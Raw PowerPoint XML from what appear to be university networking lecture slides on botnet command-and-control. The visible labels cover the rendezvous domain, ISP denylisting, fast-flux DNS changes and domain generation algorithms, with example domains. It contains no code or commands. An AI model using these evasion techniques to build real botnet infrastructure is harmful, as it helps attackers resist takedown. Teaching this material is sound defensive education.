            <a:ext cx="1176925" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>98.102.8.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="TextBox 86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770755" y="4722988"/>
            <a:ext cx="2911951" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.my-botnet.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="99" name="Straight Connector 98"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="2"/>
            <a:endCxn id="87" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225302" y="4135929"/>
            <a:ext cx="4001428" cy="587058"/>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76" idx="2"/>
            <a:endCxn id="87" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780936" y="4135929"/>
            <a:ext cx="2445794" cy="587058"/>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77" idx="2"/>
            <a:endCxn id="87" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243990" y="4135929"/>
            <a:ext cx="982740" cy="587058"/>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78" idx="2"/>
            <a:endCxn id="87" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6226730" y="4135929"/>
            <a:ext cx="737642" cy="587058"/>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79" idx="2"/>
            <a:endCxn id="87" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6226731" y="4135929"/>
            <a:ext cx="2293681" cy="587058"/>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15" name="Group 114"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="267827" y="4394477"/>
            <a:ext cx="3819106" cy="1134329"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="116" name="Rectangular Callout 115"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181601" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -69047"/>
                <a:gd name="adj2" fmla="val 2987"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="117" name="TextBox 116"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219204" y="4928315"/>
              <a:ext cx="5181601" cy="1164947"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>But: ISPs can </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>denylist</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> the rendezvous domain</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Picture 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54C7A357-9E77-4A9E-B9F6-DFCE8B91B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8931" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496568EE-908A-4A24-9164-82A417730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017" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Picture 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A30347-CE26-46AF-91E1-6152742DBF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667" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F621655E-B41E-4577-90C7-26A26DEB8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976" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Picture 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{385B92ED-C75A-479D-9B9E-BF360CD9C3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725" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Picture 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C5FA14-13B4-448F-B2F1-9AF26689C6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7365" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD4E0A86-2571-44B0-AB65-ECE17A9D9F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6159" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5CCEB5-0C7B-4D98-8B51-39CE5CD13C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774" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="Picture 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E19DD6F-D079-4B43-89EC-A0F21B187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389" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AA8A8A-376C-45AA-A70C-996A010AED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0803" y="6209663"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="112" name="Group 111"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8746744" y="1128408"/>
            <a:ext cx="3033352" cy="1463297"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="113" name="Rectangular Callout 112"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181602" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 55354"/>
                <a:gd name="adj2" fmla="val 149648"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="114" name="TextBox 113"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219203" y="4928315"/>
              <a:ext cx="5181602" cy="1310883"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Change DNS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t>IP mapping every 10 seconds</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207246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down)">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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="99"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="99"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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1" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="100"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="100"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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03"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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1" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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106"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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1" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="5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15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="5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55650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Name Generation (DGA)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7172326" y="2986541"/>
            <a:ext cx="1376875" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTP Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6549945" y="1783247"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6052230" y="2503710"/>
            <a:ext cx="647358" cy="7837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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1972476" y="4221662"/>
            <a:ext cx="510816" cy="19914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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483293" y="4221661"/>
            <a:ext cx="1325241" cy="18961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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483292" y="4221661"/>
            <a:ext cx="2243270" cy="18961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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483293" y="4221661"/>
            <a:ext cx="3079307" cy="18961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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483293" y="4221661"/>
            <a:ext cx="4066653" cy="18961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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483292" y="4221662"/>
            <a:ext cx="4900724" cy="18090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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483292" y="4221662"/>
            <a:ext cx="5811622" cy="18090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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483293" y="4221662"/>
            <a:ext cx="6833415" cy="18090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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483293" y="4221662"/>
            <a:ext cx="7751447" cy="18090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7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483292" y="4221661"/>
            <a:ext cx="325222" cy="189611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9" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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524450"/>
            <a:ext cx="979261" cy="9792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D:\Classes\CS 4700\assets\ser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196" y="2936475"/>
            <a:ext cx="881062" cy="881062"/>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Straight Connector 62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4487264" y="2503710"/>
            <a:ext cx="1564967" cy="7837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19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2280800" y="2503711"/>
            <a:ext cx="3771431" cy="86575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6" name="Picture 3" descr="D:\Classes\CS 4700\assets\ser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732" y="2936475"/>
            <a:ext cx="881062" cy="88106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descr="D:\Classes\CS 4700\assets\ser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268" y="2936475"/>
            <a:ext cx="881062" cy="8810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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489142" y="3852329"/>
            <a:ext cx="1988301" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.sb39fwn.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="TextBox 85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3439509" y="3839446"/>
            <a:ext cx="2123851" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.17-cjbq0n.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="88" name="Straight Connector 87"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1972475" y="4202511"/>
            <a:ext cx="2552880" cy="18961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3808534" y="4202512"/>
            <a:ext cx="716821" cy="20106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525354" y="4202512"/>
            <a:ext cx="201208" cy="20106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525354" y="4202512"/>
            <a:ext cx="1163552" cy="20106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525355" y="4202512"/>
            <a:ext cx="2024591" cy="20106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525355" y="4202512"/>
            <a:ext cx="2955295" cy="20106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525354" y="4202511"/>
            <a:ext cx="3873324" cy="19152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525355" y="4202512"/>
            <a:ext cx="4815369" cy="20106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525355" y="4202511"/>
            <a:ext cx="5709385" cy="19152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2890504" y="4202512"/>
            <a:ext cx="1634850" cy="201061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5688906" y="3852329"/>
            <a:ext cx="2099806" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
